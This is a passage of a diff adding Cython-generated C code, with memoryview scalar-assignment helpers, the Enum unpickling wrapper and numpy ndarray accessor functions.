__pyx_v_dst->strides, __pyx_v_ndim, __pyx_v_itemsize, __pyx_v_item); + + /* "View.MemoryView":1396 + * refcount_copying(dst, dtype_is_object, ndim, inc=False) + * _slice_assign_scalar(dst.data, dst.shape, dst.strides, ndim, itemsize, item) + * refcount_copying(dst, dtype_is_object, ndim, inc=True) # <<<<<<<<<<<<<< + * + * + */ + __pyx_memoryview_refcount_copying(__pyx_v_dst, __pyx_v_dtype_is_object, __pyx_v_ndim, 1); + + /* "View.MemoryView":1391 + * + * @cname('__pyx_memoryview_slice_assign_scalar') + * cdef void slice_assign_scalar(__Pyx_memviewslice *dst, int ndim, # <<<<<<<<<<<<<< + * size_t itemsize, void *item, + * bint dtype_is_object) noexcept nogil: + */ + + /* function exit code */ +} + +/* "View.MemoryView":1400 + * + * @cname('__pyx_memoryview__slice_assign_scalar') + * cdef void _slice_assign_scalar(char *data, Py_ssize_t *shape, # <<<<<<<<<<<<<< + * Py_ssize_t *strides, int ndim, + * size_t itemsize, void *item) noexcept nogil: + */ + +static void __pyx_memoryview__slice_assign_scalar(char *__pyx_v_data, Py_ssize_t *__pyx_v_shape, Py_ssize_t *__pyx_v_strides, int __pyx_v_ndim, size_t __pyx_v_itemsize, void *__pyx_v_item) { + CYTHON_UNUSED Py_ssize_t __pyx_v_i; + Py_ssize_t __pyx_v_stride; + Py_ssize_t __pyx_v_extent; + int __pyx_t_1; + Py_ssize_t __pyx_t_2; + Py_ssize_t __pyx_t_3; + Py_ssize_t __pyx_t_4; + + /* "View.MemoryView":1404 + * size_t itemsize, void *item) noexcept nogil: + * cdef Py_ssize_t i + * cdef Py_ssize_t stride = strides[0] # <<<<<<<<<<<<<< + * cdef Py_ssize_t extent = shape[0] + * + */ + __pyx_v_stride = (__pyx_v_strides[0]); + + /* "View.MemoryView":1405 + * cdef Py_ssize_t i + * cdef Py_ssize_t stride = strides[0] + * cdef Py_ssize_t extent = shape[0] # <<<<<<<<<<<<<< + * + * if ndim == 1: + */ + __pyx_v_extent = (__pyx_v_shape[0]); + + /* "View.MemoryView":1407 + * cdef Py_ssize_t extent = shape[0] + * + * if ndim == 1: # <<<<<<<<<<<<<< + * for i in range(extent): + * memcpy(data, item, itemsize) + */ + __pyx_t_1 = (__pyx_v_ndim == 1); + if (__pyx_t_1) { + + /* "View.MemoryView":1408 + * + * if ndim == 1: + * for i in range(extent): # <<<<<<<<<<<<<< + * memcpy(data, item, itemsize) + * data += stride + */ + __pyx_t_2 = __pyx_v_extent; + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "View.MemoryView":1409 + * if ndim == 1: + * for i in range(extent): + * memcpy(data, item, itemsize) # <<<<<<<<<<<<<< + * data += stride + * else: + */ + (void)(memcpy(__pyx_v_data, __pyx_v_item, __pyx_v_itemsize)); + + /* "View.MemoryView":1410 + * for i in range(extent): + * memcpy(data, item, itemsize) + * data += stride # <<<<<<<<<<<<<< + * else: + * for i in range(extent): + */ + __pyx_v_data = (__pyx_v_data + __pyx_v_stride); + } + + /* "View.MemoryView":1407 + * cdef Py_ssize_t extent = shape[0] + * + * if ndim == 1: # <<<<<<<<<<<<<< + * for i in range(extent): + * memcpy(data, item, itemsize) + */ + goto __pyx_L3; + } + + /* "View.MemoryView":1412 + * data += stride + * else: + * for i in range(extent): # <<<<<<<<<<<<<< + * _slice_assign_scalar(data, shape + 1, strides + 1, ndim - 1, itemsize, item) + * data += stride + */ + /*else*/ { + __pyx_t_2 = __pyx_v_extent; + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "View.MemoryView":1413 + * else: + * for i in range(extent): + * _slice_assign_scalar(data, shape + 1, strides + 1, ndim - 1, itemsize, item) # <<<<<<<<<<<<<< + * data += stride + * + */ + __pyx_memoryview__slice_assign_scalar(__pyx_v_data, (__pyx_v_shape + 1), (__pyx_v_strides + 1), (__pyx_v_ndim - 1), __pyx_v_itemsize, __pyx_v_item); + + /* "View.MemoryView":1414 + * for i in range(extent): + * _slice_assign_scalar(data, shape + 1, strides + 1, ndim - 1, itemsize, item) + * data += stride # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_data = (__pyx_v_data + __pyx_v_stride); + } + } + __pyx_L3:; + + /* "View.MemoryView":1400 + * + * @cname('__pyx_memoryview__slice_assign_scalar') + * cdef void _slice_assign_scalar(char *data, Py_ssize_t *shape, # <<<<<<<<<<<<<< + * Py_ssize_t *strides, int ndim, + * size_t itemsize, void *item) noexcept nogil: + */ + + /* function exit code */ +} + +/* "(tree fragment)":1 + * def __pyx_unpickle_Enum(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_1__pyx_unpickle_Enum(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_15View_dot_MemoryView_1__pyx_unpickle_Enum = {"__pyx_unpickle_Enum", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15View_dot_MemoryView_1__pyx_unpickle_Enum, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_15View_dot_MemoryView_1__pyx_unpickle_Enum(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v___pyx_type = 0; + long __pyx_v___pyx_checksum; + PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__pyx_unpickle_Enum (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_type,&__pyx_n_s_pyx_checksum,&__pyx_n_s_pyx_state,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_type)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 1, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_checksum)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 1, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__pyx_unpickle_Enum", 1, 3, 3, 1); __PYX_ERR(1, 1, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 1, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__pyx_unpickle_Enum", 1, 3, 3, 2); __PYX_ERR(1, 1, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__pyx_unpickle_Enum") < 0)) __PYX_ERR(1, 1, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 3)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + } + __pyx_v___pyx_type = values[0]; + __pyx_v___pyx_checksum = __Pyx_PyInt_As_long(values[1]); if (unlikely((__pyx_v___pyx_checksum == (long)-1) && PyErr_Occurred())) __PYX_ERR(1, 1, __pyx_L3_error) + __pyx_v___pyx_state = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__pyx_unpickle_Enum", 1, 3, 3, __pyx_nargs); __PYX_ERR(1, 1, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.__pyx_unpickle_Enum", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_15View_dot_MemoryView___pyx_unpickle_Enum(__pyx_self, __pyx_v___pyx_type, __pyx_v___pyx_checksum, __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView___pyx_unpickle_Enum(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v___pyx_type, long __pyx_v___pyx_checksum, PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_v___pyx_PickleError = 0; + PyObject *__pyx_v___pyx_result = 0; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + int __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_unpickle_Enum", 0); + + /* "(tree fragment)":4 + * cdef object __pyx_PickleError + * cdef object __pyx_result + * if __pyx_checksum not in (0x82a3537, 0x6ae9995, 0xb068931): # <<<<<<<<<<<<<< + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + */ + __pyx_t_1 = __Pyx_PyInt_From_long(__pyx_v___pyx_checksum); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 4, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = (__Pyx_PySequence_ContainsTF(__pyx_t_1, __pyx_tuple__8, Py_NE)); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(1, 4, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (__pyx_t_2) { + + /* "(tree fragment)":5 + * cdef object __pyx_result + * if __pyx_checksum not in (0x82a3537, 0x6ae9995, 0xb068931): + * from pickle import PickleError as __pyx_PickleError # <<<<<<<<<<<<<< + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + * __pyx_result = Enum.__new__(__pyx_type) + */ + __pyx_t_1 = PyList_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_s_PickleError); + __Pyx_GIVEREF(__pyx_n_s_PickleError); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_s_PickleError); + __pyx_t_3 = __Pyx_Import(__pyx_n_s_pickle, __pyx_t_1, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_ImportFrom(__pyx_t_3, __pyx_n_s_PickleError); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_t_1); + __pyx_v___pyx_PickleError = __pyx_t_1; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "(tree fragment)":6 + * if __pyx_checksum not in (0x82a3537, 0x6ae9995, 0xb068931): + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum # <<<<<<<<<<<<<< + * __pyx_result = Enum.__new__(__pyx_type) + * if __pyx_state is not None: + */ + __pyx_t_3 = __Pyx_PyInt_From_long(__pyx_v___pyx_checksum); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 6, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = __Pyx_PyString_Format(__pyx_kp_s_Incompatible_checksums_0x_x_vs_0, __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 6, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_Raise(__pyx_v___pyx_PickleError, __pyx_t_1, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(1, 6, __pyx_L1_error) + + /* "(tree fragment)":4 + * cdef object __pyx_PickleError + * cdef object __pyx_result + * if __pyx_checksum not in (0x82a3537, 0x6ae9995, 0xb068931): # <<<<<<<<<<<<<< + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + */ + } + + /* "(tree fragment)":7 + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + * __pyx_result = Enum.__new__(__pyx_type) # <<<<<<<<<<<<<< + * if __pyx_state is not None: + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) + */ + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_MemviewEnum_type), __pyx_n_s_new); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 7, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = NULL; + __pyx_t_5 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_4 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_4)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_4); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_5 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_4, __pyx_v___pyx_type}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 7, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_v___pyx_result = __pyx_t_1; + __pyx_t_1 = 0; + + /* "(tree fragment)":8 + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + * __pyx_result = Enum.__new__(__pyx_type) + * if __pyx_state is not None: # <<<<<<<<<<<<<< + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) + * return __pyx_result + */ + __pyx_t_2 = (__pyx_v___pyx_state != Py_None); + if (__pyx_t_2) { + + /* "(tree fragment)":9 + * __pyx_result = Enum.__new__(__pyx_type) + * if __pyx_state is not None: + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) # <<<<<<<<<<<<<< + * return __pyx_result + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): + */ + if (!(likely(PyTuple_CheckExact(__pyx_v___pyx_state))||((__pyx_v___pyx_state) == Py_None) || __Pyx_RaiseUnexpectedTypeError("tuple", __pyx_v___pyx_state))) __PYX_ERR(1, 9, __pyx_L1_error) + __pyx_t_1 = __pyx_unpickle_Enum__set_state(((struct __pyx_MemviewEnum_obj *)__pyx_v___pyx_result), ((PyObject*)__pyx_v___pyx_state)); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 9, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "(tree fragment)":8 + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + * __pyx_result = Enum.__new__(__pyx_type) + * if __pyx_state is not None: # <<<<<<<<<<<<<< + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) + * return __pyx_result + */ + } + + /* "(tree fragment)":10 + * if __pyx_state is not None: + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) + * return __pyx_result # <<<<<<<<<<<<<< + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): + * __pyx_result.name = __pyx_state[0] + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v___pyx_result); + __pyx_r = __pyx_v___pyx_result; + goto __pyx_L0; + + /* "(tree fragment)":1 + * def __pyx_unpickle_Enum(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("View.MemoryView.__pyx_unpickle_Enum", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v___pyx_PickleError); + __Pyx_XDECREF(__pyx_v___pyx_result); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":11 + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) + * return __pyx_result + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): # <<<<<<<<<<<<<< + * __pyx_result.name = __pyx_state[0] + * if len(__pyx_state) > 1 and hasattr(__pyx_result, '__dict__'): + */ + +static PyObject *__pyx_unpickle_Enum__set_state(struct __pyx_MemviewEnum_obj *__pyx_v___pyx_result, PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + Py_ssize_t __pyx_t_3; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + int __pyx_t_8; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_unpickle_Enum__set_state", 0); + + /* "(tree fragment)":12 + * return __pyx_result + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): + * __pyx_result.name = __pyx_state[0] # <<<<<<<<<<<<<< + * if len(__pyx_state) > 1 and hasattr(__pyx_result, '__dict__'): + * __pyx_result.__dict__.update(__pyx_state[1]) + */ + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 12, __pyx_L1_error) + } + __pyx_t_1 = __Pyx_GetItemInt_Tuple(__pyx_v___pyx_state, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 12, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_GIVEREF(__pyx_t_1); + __Pyx_GOTREF(__pyx_v___pyx_result->name); + __Pyx_DECREF(__pyx_v___pyx_result->name); + __pyx_v___pyx_result->name = __pyx_t_1; + __pyx_t_1 = 0; + + /* "(tree fragment)":13 + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): + * __pyx_result.name = __pyx_state[0] + * if len(__pyx_state) > 1 and hasattr(__pyx_result, '__dict__'): # <<<<<<<<<<<<<< + * __pyx_result.__dict__.update(__pyx_state[1]) + */ + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "object of type 'NoneType' has no len()"); + __PYX_ERR(1, 13, __pyx_L1_error) + } + __pyx_t_3 = PyTuple_GET_SIZE(__pyx_v___pyx_state); if (unlikely(__pyx_t_3 == ((Py_ssize_t)-1))) __PYX_ERR(1, 13, __pyx_L1_error) + __pyx_t_4 = (__pyx_t_3 > 1); + if (__pyx_t_4) { + } else { + __pyx_t_2 = __pyx_t_4; + goto __pyx_L4_bool_binop_done; + } + __pyx_t_4 = __Pyx_HasAttr(((PyObject *)__pyx_v___pyx_result), __pyx_n_s_dict); if (unlikely(__pyx_t_4 == ((int)-1))) __PYX_ERR(1, 13, __pyx_L1_error) + __pyx_t_2 = __pyx_t_4; + __pyx_L4_bool_binop_done:; + if (__pyx_t_2) { + + /* "(tree fragment)":14 + * __pyx_result.name = __pyx_state[0] + * if len(__pyx_state) > 1 and hasattr(__pyx_result, '__dict__'): + * __pyx_result.__dict__.update(__pyx_state[1]) # <<<<<<<<<<<<<< + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v___pyx_result), __pyx_n_s_dict); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 14, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = __Pyx_PyObject_GetAttrStr(__pyx_t_5, __pyx_n_s_update); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 14, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 14, __pyx_L1_error) + } + __pyx_t_5 = __Pyx_GetItemInt_Tuple(__pyx_v___pyx_state, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 14, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_7 = NULL; + __pyx_t_8 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_6))) { + __pyx_t_7 = PyMethod_GET_SELF(__pyx_t_6); + if (likely(__pyx_t_7)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_6); + __Pyx_INCREF(__pyx_t_7); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_6, function); + __pyx_t_8 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_7, __pyx_t_5}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_6, __pyx_callargs+1-__pyx_t_8, 1+__pyx_t_8); + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 14, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "(tree fragment)":13 + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): + * __pyx_result.name = __pyx_state[0] + * if len(__pyx_state) > 1 and hasattr(__pyx_result, '__dict__'): # <<<<<<<<<<<<<< + * __pyx_result.__dict__.update(__pyx_state[1]) + */ + } + + /* "(tree fragment)":11 + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) + * return __pyx_result + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): # <<<<<<<<<<<<<< + * __pyx_result.name = __pyx_state[0] + * if len(__pyx_state) > 1 and hasattr(__pyx_result, '__dict__'): + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_AddTraceback("View.MemoryView.__pyx_unpickle_Enum__set_state", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":245 + * + * @property + * cdef inline PyObject* base(self) nogil: # <<<<<<<<<<<<<< + * """Returns a borrowed reference to the object owning the data/memory. + * """ + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_7ndarray_4base_base(PyArrayObject *__pyx_v_self) { + PyObject *__pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":248 + * """Returns a borrowed reference to the object owning the data/memory. + * """ + * return PyArray_BASE(self) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_r = PyArray_BASE(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":245 + * + * @property + * cdef inline PyObject* base(self) nogil: # <<<<<<<<<<<<<< + * """Returns a borrowed reference to the object owning the data/memory. + * """ + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":251 + * + * @property + * cdef inline dtype descr(self): # <<<<<<<<<<<<<< + * """Returns an owned reference to the dtype of the array. + * """ + */ + +static CYTHON_INLINE PyArray_Descr *__pyx_f_5numpy_7ndarray_5descr_descr(PyArrayObject *__pyx_v_self) { + PyArray_Descr *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyArray_Descr *__pyx_t_1; + __Pyx_RefNannySetupContext("descr", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":254 + * """Returns an owned reference to the dtype of the array. + * """ + * return PyArray_DESCR(self) # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF((PyObject *)__pyx_r); + __pyx_t_1 = PyArray_DESCR(__pyx_v_self); + __Pyx_INCREF((PyObject *)((PyArray_Descr *)__pyx_t_1)); + __pyx_r = ((PyArray_Descr *)__pyx_t_1); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":251 + * + * @property + * cdef inline dtype descr(self): # <<<<<<<<<<<<<< + * """Returns an owned reference to the dtype of the array. + * """ + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF((PyObject *)__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":257 + * + * @property + * cdef inline int ndim(self) nogil: # <<<<<<<<<<<<<< + * """Returns the number of dimensions in the array. + * """ + */ + +static CYTHON_INLINE int __pyx_f_5numpy_7ndarray_4ndim_ndim(PyArrayObject *__pyx_v_self) { + int __pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":260 + * """Returns the number of dimensions in the array. + * """ + * return PyArray_NDIM(self) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_r = PyArray_NDIM(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":257 + * + * @property + * cdef inline int ndim(self) nogil: # <<<<<<<<<<<<<< + * """Returns the number of dimensions in the array. + * """ + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":263 + * + * @property + * cdef inline npy_intp *shape(self) nogil: # <<<<<<<<<<<<<< + * """Returns a pointer to the dimensions/shape of the array. + * The number of elements matches the number of dimensions of the array (ndim). + */ + +static CYTHON_INLINE npy_intp *__pyx_f_5numpy_7ndarray_5shape_shape(PyArrayObject 